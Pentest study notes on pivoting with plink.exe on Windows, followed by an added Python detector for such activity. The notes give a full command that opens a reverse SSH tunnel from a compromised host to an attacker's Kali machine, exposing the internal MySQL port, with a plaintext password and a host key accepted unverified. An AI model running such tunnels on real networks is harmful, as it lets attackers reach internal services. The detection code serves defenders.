Plink for Windows
- Scanning localhost on Windows
netstat -anpb TCP
- cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak 10.11.0.4 -R 10.11.0.4:1234:127.0.0.1:3306
This uses plink.exe to connect via SSH (-ssh) to our Kali machine (10.11.0.4) as the kali user (-l kali) with a password of "ilak" (-pw ilak), creating a remote port forward (-R) from port 1234 on Kali (10.11.0.4:1234) to the MySQL port on the Windows target (127.0.0.1:3306). The first time plink connects to a host, it attempts to cache the host key in the registry and prompts for confirmation. Since answering that prompt will most likely not work with the interactivity level we have in a typical reverse shell, we pipe the answer to it with the cmd.exe /c echo y command.
- Check on Kali: sudo nmap -sV 127.0.0.1 -p 1234
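
Seen from the defender's side, the command above leaves a distinctive process-creation record: a plink remote forward (-R) pointing at a loopback service, a password in the command line (-pw) and a host key accepted unverified through echo y. The following is an added example, not part of the original notes; it parses a logged command line for those three traits, and the function name, field names and the two extra sample lines are assumptions constructed for illustration.

```python
import re
import shlex

# "echo y |" feeding plink answers the host-key prompt without verification.
AUTO_ACCEPT = re.compile(r"echo\s+y\s*\|\s*\S*plink(\.exe)?", re.I)
PLINK_BIN = re.compile(r"(^|[\\/])plink(\.exe)?$", re.I)
TAKES_VALUE = {"-l", "-pw", "-P", "-i", "-L", "-D", "-R"}

def analyze_cmdline(cmdline):
    """Return findings for a logged plink command line, or None if not plink."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    idx = next((i for i, t in enumerate(tokens) if PLINK_BIN.search(t)), None)
    if idx is None:
        return None
    args = tokens[idx + 1:]
    found = {"user": None, "ssh_server": None, "password_on_cmdline": False,
             "host_key_auto_accept": bool(AUTO_ACCEPT.search(cmdline)),
             "remote_forwards": [], "exposes_loopback": False}
    i = 0
    while i < len(args):
        arg = args[i]
        val = args[i + 1] if i + 1 < len(args) else None
        if arg == "-R" and val:
            # [bind_addr:]listen_port:dest_host:dest_port (IPv4 or hostnames)
            parts = val.split(":")
            if len(parts) in (3, 4) and parts[-3].isdigit() and parts[-1].isdigit():
                fwd = {"bind": parts[0] if len(parts) == 4 else "",
                       "listen_port": int(parts[-3]),
                       "dest_host": parts[-2], "dest_port": int(parts[-1])}
                found["remote_forwards"].append(fwd)
                if fwd["dest_host"] in ("127.0.0.1", "localhost"):
                    found["exposes_loopback"] = True
        elif arg == "-pw" and val:
            found["password_on_cmdline"] = True  # never store the value itself
        elif arg == "-l" and val:
            found["user"] = val
        elif not arg.startswith("-") and found["ssh_server"] is None:
            found["ssh_server"] = arg
        i += 2 if arg in TAKES_VALUE else 1
    return found

# Constructed samples: the command from these notes and two unrelated ones.
SAMPLES = [
    "cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak 10.11.0.4 -R 10.11.0.4:1234:127.0.0.1:3306",
    r'"C:\Program Files\PuTTY\plink.exe" -ssh -batch admin@host.example',
    "notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze_cmdline(line))
```

Feed it the command-line field from process-creation logging (for example Windows event 4688 with command-line auditing enabled, or Sysmon event 1) and alert when remote_forwards is non-empty and exposes_loopback is true.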